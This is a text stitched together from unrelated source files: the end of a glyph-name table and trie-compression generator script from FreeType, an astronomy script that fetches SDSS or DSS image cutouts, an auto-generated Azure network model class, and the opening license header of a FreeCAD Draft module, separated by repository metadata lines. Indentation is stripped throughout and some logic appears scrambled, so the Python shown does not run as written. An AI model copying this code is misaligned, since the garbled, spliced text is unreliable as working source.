tehmeeminitialarabic;FCA4
tehmeemisolatedarabic;FC0E
tehnoonfinalarabic;FC73
tekatakana;30C6
tekatakanahalfwidth;FF83
telephone;2121
telephoneblack;260E
telishagedolahebrew;05A0
telishaqetanahebrew;05A9
tencircle;2469
tenideographicparen;3229
tenparen;247D
tenperiod;2491
tenroman;2179
tesh;02A7
tet;05D8
tetdagesh;FB38
tetdageshhebrew;FB38
tethebrew;05D8
tetsecyrillic;04B5
tevirhebrew;059B
tevirlefthebrew;059B
thabengali;09A5
thadeva;0925
thagujarati;0AA5
thagurmukhi;0A25
thalarabic;0630
thalfinalarabic;FEAC
thanthakhatlowleftthai;F898
thanthakhatlowrightthai;F897
thanthakhatthai;0E4C
thanthakhatupperleftthai;F896
theharabic;062B
thehfinalarabic;FE9A
thehinitialarabic;FE9B
thehmedialarabic;FE9C
thereexists;2203
therefore;2234
theta;03B8
theta1;03D1
thetasymbolgreek;03D1
thieuthacirclekorean;3279
thieuthaparenkorean;3219
thieuthcirclekorean;326B
thieuthkorean;314C
thieuthparenkorean;320B
thirteencircle;246C
thirteenparen;2480
thirteenperiod;2494
thonangmonthothai;0E11
thook;01AD
thophuthaothai;0E12
thorn;00FE
thothahanthai;0E17
thothanthai;0E10
thothongthai;0E18
thothungthai;0E16
thousandcyrillic;0482
thousandsseparatorarabic;066C
thousandsseparatorpersian;066C
three;0033
threearabic;0663
threebengali;09E9
threecircle;2462
threecircleinversesansserif;278C
threedeva;0969
threeeighths;215C
threegujarati;0AE9
threegurmukhi;0A69
threehackarabic;0663
threehangzhou;3023
threeideographicparen;3222
threeinferior;2083
threemonospace;FF13
threenumeratorbengali;09F6
threeoldstyle;F733
threeparen;2476
threeperiod;248A
threepersian;06F3
threequarters;00BE
threequartersemdash;F6DE
threeroman;2172
threesuperior;00B3
threethai;0E53
thzsquare;3394
tihiragana;3061
tikatakana;30C1
tikatakanahalfwidth;FF81
tikeutacirclekorean;3270
tikeutaparenkorean;3210
tikeutcirclekorean;3262
tikeutkorean;3137
tikeutparenkorean;3202
tilde;02DC
tildebelowcmb;0330
tildecmb;0303
tildecomb;0303
tildedoublecmb;0360
tildeoperator;223C
tildeoverlaycmb;0334
tildeverticalcmb;033E
timescircle;2297
tipehahebrew;0596
tipehalefthebrew;0596
tippigurmukhi;0A70
titlocyrilliccmb;0483
tiwnarmenian;057F
tlinebelow;1E6F
tmonospace;FF54
toarmenian;0569
tohiragana;3068
tokatakana;30C8
tokatakanahalfwidth;FF84
tonebarextrahighmod;02E5
tonebarextralowmod;02E9
tonebarhighmod;02E6
tonebarlowmod;02E8
tonebarmidmod;02E7
tonefive;01BD
tonesix;0185
tonetwo;01A8
tonos;0384
tonsquare;3327
topatakthai;0E0F
tortoiseshellbracketleft;3014
tortoiseshellbracketleftsmall;FE5D
tortoiseshellbracketleftvertical;FE39
tortoiseshellbracketright;3015
tortoiseshellbracketrightsmall;FE5E
tortoiseshellbracketrightvertical;FE3A
totaothai;0E15
tpalatalhook;01AB
tparen;24AF
trademark;2122
trademarksans;F8EA
trademarkserif;F6DB
tretroflexhook;0288
triagdn;25BC
triaglf;25C4
triagrt;25BA
triagup;25B2
ts;02A6
tsadi;05E6
tsadidagesh;FB46
tsadidageshhebrew;FB46
tsadihebrew;05E6
tsecyrillic;0446
tsere;05B5
tsere12;05B5
tsere1e;05B5
tsere2b;05B5
tserehebrew;05B5
tserenarrowhebrew;05B5
tserequarterhebrew;05B5
tserewidehebrew;05B5
tshecyrillic;045B
tsuperior;F6F3
ttabengali;099F
ttadeva;091F
ttagujarati;0A9F
ttagurmukhi;0A1F
tteharabic;0679
ttehfinalarabic;FB67
ttehinitialarabic;FB68
ttehmedialarabic;FB69
tthabengali;09A0
tthadeva;0920
tthagujarati;0AA0
tthagurmukhi;0A20
tturned;0287
tuhiragana;3064
tukatakana;30C4
tukatakanahalfwidth;FF82
tusmallhiragana;3063
tusmallkatakana;30C3
tusmallkatakanahalfwidth;FF6F
twelvecircle;246B
twelveparen;247F
twelveperiod;2493
twelveroman;217B
twentycircle;2473
twentyhangzhou;5344
twentyparen;2487
twentyperiod;249B
two;0032
twoarabic;0662
twobengali;09E8
twocircle;2461
twocircleinversesansserif;278B
twodeva;0968
twodotenleader;2025
twodotleader;2025
twodotleadervertical;FE30
twogujarati;0AE8
twogurmukhi;0A68
twohackarabic;0662
twohangzhou;3022
twoideographicparen;3221
twoinferior;2082
twomonospace;FF12
twonumeratorbengali;09F5
twooldstyle;F732
twoparen;2475
twoperiod;2489
twopersian;06F2
tworoman;2171
twostroke;01BB
twosuperior;00B2
twothai;0E52
twothirds;2154
u;0075
uacute;00FA
ubar;0289
ubengali;0989
ubopomofo;3128
ubreve;016D
ucaron;01D4
ucircle;24E4
ucircumflex;00FB
ucircumflexbelow;1E77
ucyrillic;0443
udattadeva;0951
udblacute;0171
udblgrave;0215
udeva;0909
udieresis;00FC
udieresisacute;01D8
udieresisbelow;1E73
udieresiscaron;01DA
udieresiscyrillic;04F1
udieresisgrave;01DC
udieresismacron;01D6
udotbelow;1EE5
ugrave;00F9
ugujarati;0A89
ugurmukhi;0A09
uhiragana;3046
uhookabove;1EE7
uhorn;01B0
uhornacute;1EE9
uhorndotbelow;1EF1
uhorngrave;1EEB
uhornhookabove;1EED
uhorntilde;1EEF
uhungarumlaut;0171
uhungarumlautcyrillic;04F3
uinvertedbreve;0217
ukatakana;30A6
ukatakanahalfwidth;FF73
ukcyrillic;0479
ukorean;315C
umacron;016B
umacroncyrillic;04EF
umacrondieresis;1E7B
umatragurmukhi;0A41
umonospace;FF55
underscore;005F
underscoredbl;2017
underscoremonospace;FF3F
underscorevertical;FE33
underscorewavy;FE4F
union;222A
universal;2200
uogonek;0173
uparen;24B0
upblock;2580
upperdothebrew;05C4
upsilon;03C5
upsilondieresis;03CB
upsilondieresistonos;03B0
upsilonlatin;028A
upsilontonos;03CD
uptackbelowcmb;031D
uptackmod;02D4
uragurmukhi;0A73
uring;016F
ushortcyrillic;045E
usmallhiragana;3045
usmallkatakana;30A5
usmallkatakanahalfwidth;FF69
ustraightcyrillic;04AF
ustraightstrokecyrillic;04B1
utilde;0169
utildeacute;1E79
utildebelow;1E75
uubengali;098A
uudeva;090A
uugujarati;0A8A
uugurmukhi;0A0A
uumatragurmukhi;0A42
uuvowelsignbengali;09C2
uuvowelsigndeva;0942
uuvowelsigngujarati;0AC2
uvowelsignbengali;09C1
uvowelsigndeva;0941
uvowelsigngujarati;0AC1
v;0076
vadeva;0935
vagujarati;0AB5
vagurmukhi;0A35
vakatakana;30F7
vav;05D5
vavdagesh;FB35
vavdagesh65;FB35
vavdageshhebrew;FB35
vavhebrew;05D5
vavholam;FB4B
vavholamhebrew;FB4B
vavvavhebrew;05F0
vavyodhebrew;05F1
vcircle;24E5
vdotbelow;1E7F
vecyrillic;0432
veharabic;06A4
vehfinalarabic;FB6B
vehinitialarabic;FB6C
vehmedialarabic;FB6D
vekatakana;30F9
venus;2640
verticalbar;007C
verticallineabovecmb;030D
verticallinebelowcmb;0329
verticallinelowmod;02CC
verticallinemod;02C8
vewarmenian;057E
vhook;028B
vikatakana;30F8
viramabengali;09CD
viramadeva;094D
viramagujarati;0ACD
visargabengali;0983
visargadeva;0903
visargagujarati;0A83
vmonospace;FF56
voarmenian;0578
voicediterationhiragana;309E
voicediterationkatakana;30FE
voicedmarkkana;309B
voicedmarkkanahalfwidth;FF9E
vokatakana;30FA
vparen;24B1
vtilde;1E7D
vturned;028C
vuhiragana;3094
vukatakana;30F4
w;0077
wacute;1E83
waekorean;3159
wahiragana;308F
wakatakana;30EF
wakatakanahalfwidth;FF9C
wakorean;3158
wasmallhiragana;308E
wasmallkatakana;30EE
wattosquare;3357
wavedash;301C
wavyunderscorevertical;FE34
wawarabic;0648
wawfinalarabic;FEEE
wawhamzaabovearabic;0624
wawhamzaabovefinalarabic;FE86
wbsquare;33DD
wcircle;24E6
wcircumflex;0175
wdieresis;1E85
wdotaccent;1E87
wdotbelow;1E89
wehiragana;3091
weierstrass;2118
wekatakana;30F1
wekorean;315E
weokorean;315D
wgrave;1E81
whitebullet;25E6
whitecircle;25CB
whitecircleinverse;25D9
whitecornerbracketleft;300E
whitecornerbracketleftvertical;FE43
whitecornerbracketright;300F
whitecornerbracketrightvertical;FE44
whitediamond;25C7
whitediamondcontainingblacksmalldiamond;25C8
whitedownpointingsmalltriangle;25BF
whitedownpointingtriangle;25BD
whiteleftpointingsmalltriangle;25C3
whiteleftpointingtriangle;25C1
whitelenticularbracketleft;3016
whitelenticularbracketright;3017
whiterightpointingsmalltriangle;25B9
whiterightpointingtriangle;25B7
whitesmallsquare;25AB
whitesmilingface;263A
whitesquare;25A1
whitestar;2606
whitetelephone;260F
whitetortoiseshellbracketleft;3018
whitetortoiseshellbracketright;3019
whiteuppointingsmalltriangle;25B5
whiteuppointingtriangle;25B3
wihiragana;3090
wikatakana;30F0
wikorean;315F
wmonospace;FF57
wohiragana;3092
wokatakana;30F2
wokatakanahalfwidth;FF66
won;20A9
wonmonospace;FFE6
wowaenthai;0E27
wparen;24B2
wring;1E98
wsuperior;02B7
wturned;028D
wynn;01BF
x;0078
xabovecmb;033D
xbopomofo;3112
xcircle;24E7
xdieresis;1E8D
xdotaccent;1E8B
xeharmenian;056D
xi;03BE
xmonospace;FF58
xparen;24B3
xsuperior;02E3
y;0079
yaadosquare;334E
yabengali;09AF
yacute;00FD
yadeva;092F
yaekorean;3152
yagujarati;0AAF
yagurmukhi;0A2F
yahiragana;3084
yakatakana;30E4
yakatakanahalfwidth;FF94
yakorean;3151
yamakkanthai;0E4E
yasmallhiragana;3083
yasmallkatakana;30E3
yasmallkatakanahalfwidth;FF6C
yatcyrillic;0463
ycircle;24E8
ycircumflex;0177
ydieresis;00FF
ydotaccent;1E8F
ydotbelow;1EF5
yeharabic;064A
yehbarreearabic;06D2
yehbarreefinalarabic;FBAF
yehfinalarabic;FEF2
yehhamzaabovearabic;0626
yehhamzaabovefinalarabic;FE8A
yehhamzaaboveinitialarabic;FE8B
yehhamzaabovemedialarabic;FE8C
yehinitialarabic;FEF3
yehmedialarabic;FEF4
yehmeeminitialarabic;FCDD
yehmeemisolatedarabic;FC58
yehnoonfinalarabic;FC94
yehthreedotsbelowarabic;06D1
yekorean;3156
yen;00A5
yenmonospace;FFE5
yeokorean;3155
yeorinhieuhkorean;3186
yerahbenyomohebrew;05AA
yerahbenyomolefthebrew;05AA
yericyrillic;044B
yerudieresiscyrillic;04F9
yesieungkorean;3181
yesieungpansioskorean;3183
yesieungsioskorean;3182
yetivhebrew;059A
ygrave;1EF3
yhook;01B4
yhookabove;1EF7
yiarmenian;0575
yicyrillic;0457
yikorean;3162
yinyang;262F
yiwnarmenian;0582
ymonospace;FF59
yod;05D9
yoddagesh;FB39
yoddageshhebrew;FB39
yodhebrew;05D9
yodyodhebrew;05F2
yodyodpatahhebrew;FB1F
yohiragana;3088
yoikorean;3189
yokatakana;30E8
yokatakanahalfwidth;FF96
yokorean;315B
yosmallhiragana;3087
yosmallkatakana;30E7
yosmallkatakanahalfwidth;FF6E
yotgreek;03F3
yoyaekorean;3188
yoyakorean;3187
yoyakthai;0E22
yoyingthai;0E0D
yparen;24B4
ypogegrammeni;037A
ypogegrammenigreekcmb;0345
yr;01A6
yring;1E99
ysuperior;02B8
ytilde;1EF9
yturned;028E
yuhiragana;3086
yuikorean;318C
yukatakana;30E6
yukatakanahalfwidth;FF95
yukorean;3160
yusbigcyrillic;046B
yusbigiotifiedcyrillic;046D
yuslittlecyrillic;0467
yuslittleiotifiedcyrillic;0469
yusmallhiragana;3085
yusmallkatakana;30E5
yusmallkatakanahalfwidth;FF6D
yuyekorean;318B
yuyeokorean;318A
yyabengali;09DF
yyadeva;095F
z;007A
zaarmenian;0566
zacute;017A
zadeva;095B
zagurmukhi;0A5B
zaharabic;0638
zahfinalarabic;FEC6
zahinitialarabic;FEC7
zahiragana;3056
zahmedialarabic;FEC8
zainarabic;0632
zainfinalarabic;FEB0
zakatakana;30B6
zaqefgadolhebrew;0595
zaqefqatanhebrew;0594
zarqahebrew;0598
zayin;05D6
zayindagesh;FB36
zayindageshhebrew;FB36
zayinhebrew;05D6
zbopomofo;3117
zcaron;017E
zcircle;24E9
zcircumflex;1E91
zcurl;0291
zdot;017C
zdotaccent;017C
zdotbelow;1E93
zecyrillic;0437
zedescendercyrillic;0499
zedieresiscyrillic;04DF
zehiragana;305C
zekatakana;30BC
zero;0030
zeroarabic;0660
zerobengali;09E6
zerodeva;0966
zerogujarati;0AE6
zerogurmukhi;0A66
zerohackarabic;0660
zeroinferior;2080
zeromonospace;FF10
zerooldstyle;F730
zeropersian;06F0
zerosuperior;2070
zerothai;0E50
zerowidthjoiner;FEFF
zerowidthnonjoiner;200C
zerowidthspace;200B
zeta;03B6
zhbopomofo;3113
zhearmenian;056A
zhebrevecyrillic;04C2
zhecyrillic;0436
zhedescendercyrillic;0497
zhedieresiscyrillic;04DD
zihiragana;3058
zikatakana;30B8
zinorhebrew;05AE
zlinebelow;1E95
zmonospace;FF5A
zohiragana;305E
zokatakana;30BE
zparen;24B5
zretroflexhook;0290
zstroke;01B6
zuhiragana;305A
zukatakana;30BA
"""
# string table management
#
class StringTable:
def __init__( self, name_list, master_table_name ):
self.names = name_list
self.master_table = master_table_name
self.indices = {}
index = 0
for name in name_list:
self.indices[name] = index
index += len( name ) + 1
self.total = index
def dump( self, file ):
write = file.write
write( " static const char " + self.master_table +
"[" + repr( self.total ) + "] =\n" )
write( " {\n" )
line = ""
for name in self.names:
line += " '"
line += string.join( ( re.findall( ".", name ) ), "','" )
line += "', 0,\n"
write( line + " };\n\n\n" )
def dump_sublist( self, file, table_name, macro_name, sublist ):
write = file.write
write( "#define " + macro_name + " " + repr( len( sublist ) ) + "\n\n" )
write( " /* Values are offsets into the `" +
self.master_table + "' table */\n\n" )
write( " static const short " + table_name +
"[" + macro_name + "] =\n" )
write( " {\n" )
line = " "
comma = ""
col = 0
for name in sublist:
line += comma
line += "%4d" % self.indices[name]
col += 1
comma = ","
if col == 14:
col = 0
comma = ",\n "
write( line + "\n };\n\n\n" )
# We now store the Adobe Glyph List in compressed form. The list is put
# into a data structure called `trie' (because it has a tree-like
# appearance). Consider, for example, that you want to store the
# following name mapping:
#
# A => 1
# Aacute => 6
# Abalon => 2
# Abstract => 4
#
# It is possible to store the entries as follows.
#
# A => 1
# |
# +-acute => 6
# |
# +-b
# |
# +-alon => 2
# |
# +-stract => 4
#
# We see that each node in the trie has:
#
# - one or more `letters'
# - an optional value
# - zero or more child nodes
#
# The first step is to call
#
# root = StringNode( "", 0 )
# for word in map.values():
# root.add( word, map[word] )
#
# which creates a large trie where each node has only one children.
#
# Executing
#
# root = root.optimize()
#
# optimizes the trie by merging the letters of successive nodes whenever
# possible.
#
# Each node of the trie is stored as follows.
#
# - First the node's letter, according to the following scheme. We
# use the fact that in the AGL no name contains character codes > 127.
#
# name bitsize description
# ----------------------------------------------------------------
# notlast 1 Set to 1 if this is not the last letter
# in the word.
# ascii 7 The letter's ASCII value.
#
# - The letter is followed by a children count and the value of the
# current key (if any). Again we can do some optimization because all
# AGL entries are from the BMP; this means that 16 bits are sufficient
# to store its Unicode values. Additionally, no node has more than
# 127 children.
#
# name bitsize description
# -----------------------------------------
# hasvalue 1 Set to 1 if a 16-bit Unicode value follows.
# num_children 7 Number of children. Can be 0 only if
# `hasvalue' is set to 1.
# value 16 Optional Unicode value.
#
# - A node is finished by a list of 16bit absolute offsets to the
# children, which must be sorted in increasing order of their first
# letter.
#
# For simplicity, all 16bit quantities are stored in big-endian order.
#
# The root node has first letter = 0, and no value.
#
class StringNode:
def __init__( self, letter, value ):
self.letter = letter
self.value = value
self.children = {}
def __cmp__( self, other ):
return ord( self.letter[0] ) - ord( other.letter[0] )
def add( self, word, value ):
if len( word ) == 0:
self.value = value
return
letter = word[0]
word = word[1:]
if self.children.has_key( letter ):
child = self.children[letter]
else:
child = StringNode( letter, 0 )
self.children[letter] = child
child.add( word, value )
def optimize( self ):
# optimize all children first
children = self.children.values()
self.children = {}
for child in children:
self.children[child.letter[0]] = child.optimize()
# don't optimize if there's a value,
# if we don't have any child or if we
# have more than one child
if ( self.value != 0 ) or ( not children ) or len( children ) > 1:
return self
child = children[0]
self.letter += child.letter
self.value = child.value
self.children = child.children
return self
def dump_debug( self, write, margin ):
# this is used during debugging
line = margin + "+-"
if len( self.letter ) == 0:
line += "<NOLETTER>"
else:
line += self.letter
if self.value:
line += " => " + repr( self.value )
write( line + "\n" )
if self.children:
margin += "| "
for child in self.children.values():
child.dump_debug( write, margin )
def locate( self, index ):
self.index = index
if len( self.letter ) > 0:
index += len( self.letter ) + 1
else:
index += 2
if self.value != 0:
index += 2
children = self.children.values()
children.sort()
index += 2 * len( children )
for child in children:
index = child.locate( index )
return index
def store( self, storage ):
# write the letters
l = len( self.letter )
if l == 0:
storage += struct.pack( "B", 0 )
else:
for n in range( l ):
val = ord( self.letter[n] )
if n < l - 1:
val += 128
storage += struct.pack( "B", val )
# write the count
children = self.children.values()
children.sort()
count = len( children )
if self.value != 0:
storage += struct.pack( "!BH", count + 128, self.value )
else:
storage += struct.pack( "B", count )
for child in children:
storage += struct.pack( "!H", child.index )
for child in children:
storage = child.store( storage )
return storage
def adobe_glyph_values():
"""return the list of glyph names and their unicode values"""
lines = string.split( adobe_glyph_list, '\n' )
glyphs = []
values = []
for line in lines:
if line:
fields = string.split( line, ';' )
# print fields[1] + ' - ' + fields[0]
subfields = string.split( fields[1], ' ' )
if len( subfields ) == 1:
glyphs.append( fields[0] )
values.append( fields[1] )
return glyphs, values
def filter_glyph_names( alist, filter ):
"""filter `alist' by taking _out_ all glyph names that are in `filter'"""
count = 0
extras = []
for name in alist:
try:
filtered_index = filter.index( name )
except:
extras.append( name )
return extras
def dump_encoding( file, encoding_name, encoding_list ):
"""dump a given encoding"""
write = file.write
write( " /* the following are indices into the SID name table */\n" )
write( " static const unsigned short " + encoding_name +
"[" + repr( len( encoding_list ) ) + "] =\n" )
write( " {\n" )
line = " "
comma = ""
col = 0
for value in encoding_list:
line += comma
line += "%3d" % value
comma = ","
col += 1
if col == 16:
col = 0
comma = ",\n "
write( line + "\n };\n\n\n" )
def dump_array( the_array, write, array_name ):
"""dumps a given encoding"""
write( " static const unsigned char " + array_name +
"[" + repr( len( the_array ) ) + "] =\n" )
write( " {\n" )
line = ""
comma = " "
col = 0
for value in the_array:
line += comma
line += "%3d" % ord( value )
comma = ","
col += 1
if col == 16:
col = 0
comma = ",\n "
if len( line ) > 1024:
write( line )
line = ""
write( line + "\n };\n\n\n" )
def main():
"""main program body"""
if len( sys.argv ) != 2:
print __doc__ % sys.argv[0]
sys.exit( 1 )
file = open( sys.argv[1], "w\n" )
write = file.write
count_sid = len( sid_standard_names )
# `mac_extras' contains the list of glyph names in the Macintosh standard
# encoding which are not in the SID Standard Names.
#
mac_extras = filter_glyph_names( mac_standard_names, sid_standard_names )
# `base_list' contains the names of our final glyph names table.
# It consists of the `mac_extras' glyph names, followed by the SID
# standard names.
#
mac_extras_count = len( mac_extras )
base_list = mac_extras + sid_standard_names
write( "/***************************************************************************/\n" )
write( "/* */\n" )
write( "/* %-71s*/\n" % os.path.basename( sys.argv[1] ) )
write( "/* */\n" )
write( "/* PostScript glyph names. */\n" )
write( "/* */\n" )
write( "/* Copyright 2005 by */\n" )
write( "/* David Turner, Robert Wilhelm, and Werner Lemberg. */\n" )
write( "/* */\n" )
write( "/* This file is part of the FreeType project, and may only be used, */\n" )
write( "/* modified, and distributed under the terms of the FreeType project */\n" )
write( "/* license, LICENSE.TXT. By continuing to use, modify, or distribute */\n" )
write( "/* this file you indicate that you have read the license and */\n" )
write( "/* understand and accept it fully. */\n" )
write( "/* */\n" )
write( "/***************************************************************************/\n" )
write( "\n" )
write( "\n" )
write( " /* This file has been generated automatically -- do not edit! */\n" )
write( "\n" )
write( "\n" )
# dump final glyph list (mac extras + sid standard names)
#
st = StringTable( base_list, "ft_standard_glyph_names" )
st.dump( file )
st.dump_sublist( file, "ft_mac_names",
"FT_NUM_MAC_NAMES", mac_standard_names )
st.dump_sublist( file, "ft_sid_names",
"FT_NUM_SID_NAMES", sid_standard_names )
dump_encoding( file, "t1_standard_encoding", t1_standard_encoding )
dump_encoding( file, "t1_expert_encoding", t1_expert_encoding )
# dump the AGL in its compressed form
#
agl_glyphs, agl_values = adobe_glyph_values()
dict = StringNode( "", 0 )
for g in range( len( agl_glyphs ) ):
dict.add( agl_glyphs[g], eval( "0x" + agl_values[g] ) )
dict = dict.optimize()
dict_len = dict.locate( 0 )
dict_array = dict.store( "" )
write( """\
/*
* This table is a compressed version of the Adobe Glyph List (AGL),
* optimized for efficient searching. It has been generated by the
* `glnames.py' python script located in the `src/tools' directory.
*
* The lookup function to get the Unicode value for a given string
* is defined below the table.
*/
""" )
dump_array( dict_array, write, "ft_adobe_glyph_list" )
# write the lookup routine now
#
write( """\
/*
* This function searches the compressed table efficiently.
*/
static unsigned long
ft_get_adobe_glyph_index( const char* name,
const char* limit )
{
int c = 0;
int count, min, max;
const unsigned char* p = ft_adobe_glyph_list;
if ( name == 0 || name >= limit )
goto NotFound;
c = *name++;
count = p[1];
p += 2;
min = 0;
max = count;
while ( min < max )
{
int mid = ( min + max ) >> 1;
const unsigned char* q = p + mid * 2;
int c2;
q = ft_adobe_glyph_list + ( ( (int)q[0] << 8 ) | q[1] );
c2 = q[0] & 127;
if ( c2 == c )
{
p = q;
goto Found;
}
if ( c2 < c )
min = mid + 1;
else
max = mid;
}
goto NotFound;
Found:
for (;;)
{
/* assert (*p & 127) == c */
if ( name >= limit )
{
if ( (p[0] & 128) == 0 &&
(p[1] & 128) != 0 )
return (unsigned long)( ( (int)p[2] << 8 ) | p[3] );
goto NotFound;
}
c = *name++;
if ( p[0] & 128 )
{
p++;
if ( c != (p[0] & 127) )
goto NotFound;
continue;
}
p++;
count = p[0] & 127;
if ( p[0] & 128 )
p += 2;
p++;
for ( ; count > 0; count--, p += 2 )
{
int offset = ( (int)p[0] << 8 ) | p[1];
const unsigned char* q = ft_adobe_glyph_list + offset;
if ( c == ( q[0] & 127 ) )
{
p = q;
goto NextIter;
}
}
goto NotFound;
NextIter:
;
}
NotFound:
return 0;
}
""" )
if 0: # generate unit test, or don't
#
# now write the unit test to check that everything works OK
#
write( "#ifdef TEST\n\n" )
write( "static const char* const the_names[] = {\n" )
for name in agl_glyphs:
write( ' "' + name + '",\n' )
write( " 0\n};\n" )
write( "static const unsigned long the_values[] = {\n" )
for val in agl_values:
write( ' 0x' + val + ',\n' )
write( " 0\n};\n" )
write( """
#include <stdlib.h>
#include <stdio.h>
int
main( void )
{
int result = 0;
const char* const* names = the_names;
const unsigned long* values = the_values;
for ( ; *names; names++, values++ )
{
const char* name = *names;
unsigned long reference = *values;
unsigned long value;
value = ft_get_adobe_glyph_index( name, name + strlen( name ) );
if ( value != reference )
{
result = 1;
fprintf( stderr, "name '%s' => %04x instead of %04x\\n",
name, value, reference );
}
}
return result;
}
""" )
write( "#endif /* TEST */\n" )
write("\n/* END */\n")
# Now run the main routine
#
main()
# END
| lgpl-2.1 | 8,445,638,624,428,069,000 | 18.558311 | 92 | 0.793015 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_10_01/models/connectivity_hop.py | 1 | 2114 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ConnectivityHop(Model):
"""Information about a hop between the source and the destination.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar type: The type of the hop.
:vartype type: str
:ivar id: The ID of the hop.
:vartype id: str
:ivar address: The IP address of the hop.
:vartype address: str
:ivar resource_id: The ID of the resource corresponding to this hop.
:vartype resource_id: str
:ivar next_hop_ids: List of next hop identifiers.
:vartype next_hop_ids: list[str]
:ivar issues: List of issues.
:vartype issues:
list[~azure.mgmt.network.v2017_10_01.models.ConnectivityIssue]
"""
_validation = {
'type': {'readonly': True},
'id': {'readonly': True},
'address': {'readonly': True},
'resource_id': {'readonly': True},
'next_hop_ids': {'readonly': True},
'issues': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'address': {'key': 'address', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'next_hop_ids': {'key': 'nextHopIds', 'type': '[str]'},
'issues': {'key': 'issues', 'type': '[ConnectivityIssue]'},
}
def __init__(self, **kwargs):
super(ConnectivityHop, self).__init__(**kwargs)
self.type = None
self.id = None
self.address = None
self.resource_id = None
self.next_hop_ids = None
self.issues = None
| mit | 5,632,207,756,155,749,000 | 33.655738 | 76 | 0.563387 | false |
nhmc/xastropy | xastropy/obs/x_getsdssimg.py | 1 | 4285 | #;+
#; NAME:
#; x_getsdssimg
#; Version 1.1
#;
#; PURPOSE:
#; Returns an Image by querying the SDSS website
#; Will use DSS2-red as a backup
#;
#; CALLING SEQUENCE:
#;
#; INPUTS:
#;
#; RETURNS:
#;
#; OUTPUTS:
#;
#; OPTIONAL KEYWORDS:
#;
#; OPTIONAL OUTPUTS:
#;
#; COMMENTS:
#;
#; EXAMPLES:
#;
#; PROCEDURES/FUNCTIONS CALLED:
#;
#; REVISION HISTORY:
#; 23-Apr-2014 Written by JXP
#;-
#;------------------------------------------------------------------------------
# Import libraries
from __future__ import print_function, absolute_import, division#, unicode_literals
import requests
from cStringIO import StringIO
from astroquery.sdss import SDSS
from astropy.coordinates import SkyCoord
from astropy import units as u
from xastropy.xutils import xdebug as xdb
# Generate the SDSS URL (default is 202" on a side)
def sdsshttp(ra, dec, imsize, scale=0.39612, grid=None, label=None, invert=None):#, xs, ys):
# Pixels
npix = round(imsize*60./scale)
xs = npix
ys = npix
#from StringIO import StringIO
# Generate the http call
name1='http://skyservice.pha.jhu.edu/DR12/ImgCutout/'
name='getjpeg.aspx?ra='
name+=str(ra) #setting the ra
name+='&dec='
name+=str(dec) #setting the declination
name+='&scale='
name+=str(scale) #setting the scale
name+='&width='
name+=str(int(xs)) #setting the width
name+='&height='
name+=str(int(ys)) #setting the height
#------ Options
options = ''
if grid != None:
options+='G'
if label != None:
options+='L'
if invert != None:
options+='I'
if len(options) > 0:
name+='&opt='+options
name+='&query='
url = name1+name
return url
# Generate the SDSS URL (default is 202" on a side)
def dsshttp(ra, dec, imsize):
#https://archive.stsci.edu/cgi-bin/dss_search?v=poss2ukstu_red&r=00:42:44.35&d=+41:16:08.6&e=J2000&h=15.0&w=15.0&f=gif&c=none&fov=NONE&v3=
Equinox = 'J2000'
dss = 'poss2ukstu_red'
url = "http://archive.stsci.edu/cgi-bin/dss_search?"
url += "v="+dss+'&r='+str(ra)+'&d='+str(dec)
url += "&e="+Equinox
url += '&h='+str(imsize)+"&w="+str(imsize)
url += "&f=gif"
url += "&c=none"
url += "&fov=NONE"
url += "&v3="
return url
# ##########################################
def getimg(ira, idec, imsize, BW=False, DSS=None):
''' Grab an SDSS image from the given URL, if possible
Parameters:
----------
ira: (float or Quantity) RA in decimal degrees
idec: (float or Quantity) DEC in decimal degrees
'''
import PIL
from PIL import Image
# Strip units as need be
try:
ra = ira.value
except AttributeError:
ra = ira
dec = idec
else:
dec = idec.value
# Get URL
if DSS == None: # Default
url = sdsshttp(ra,dec,imsize)
else:
url = dsshttp(ra,dec,imsize) # DSS
# Request
rtv = requests.get(url)
# Query for photometry
coord = SkyCoord(ra=ra*u.degree, dec=dec*u.degree)
phot = SDSS.query_region(coord, radius=0.02*u.deg)
if phot is None:
print('getimg: Pulling from DSS instead of SDSS')
BW = 1
url = dsshttp(ra,dec,imsize) # DSS
rtv = requests.get(url)
img = Image.open(StringIO(rtv.content))
# B&W ?
if BW:
import PIL.ImageOps
img2 = img.convert("L")
img2 = PIL.ImageOps.invert(img2)
img = img2
return img, BW
# ##########################################
def get_spec_img(ra, dec):
from PIL import Image
from cStringIO import StringIO
# Coord
if hasattr(ra,'unit'):
coord = SkyCoord(ra=ra, dec=dec)
else:
coord = SkyCoord(ra=ra*u.degree, dec=dec*u.degree)
# Query database
radius = 1*u.arcsec
spec_catalog = SDSS.query_region(coord,spectro=True, radius=radius.to('degree'))
# Request
url = 'http://skyserver.sdss.org/dr12/en/get/SpecById.ashx?id='+str(int(spec_catalog['specobjid']))
rtv = requests.get(url)
img = Image.open(StringIO(rtv.content))
return img
# #############
# Call with RA/DEC (decimal degrees)
def radecd(ra, dec):
import x_getsdssimg as x_gsdss
img = x_gsdss.getimg(ra,dec)
return img
| bsd-3-clause | -1,572,045,953,393,898,200 | 22.288043 | 142 | 0.574329 | false |
sanguinariojoe/FreeCAD | src/Mod/Draft/draftfunctions/mirror.py | 9 | 4578 | # ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <yorik@uncreated.net> *
# * Copyright (c) 2009, 2010 Ken Cline <cline@frii.com> *
# * Copyright (c) 2020 Carlo Pavan <carlopav@gmail.com> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <e.cabrera-castillo@tum.de> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
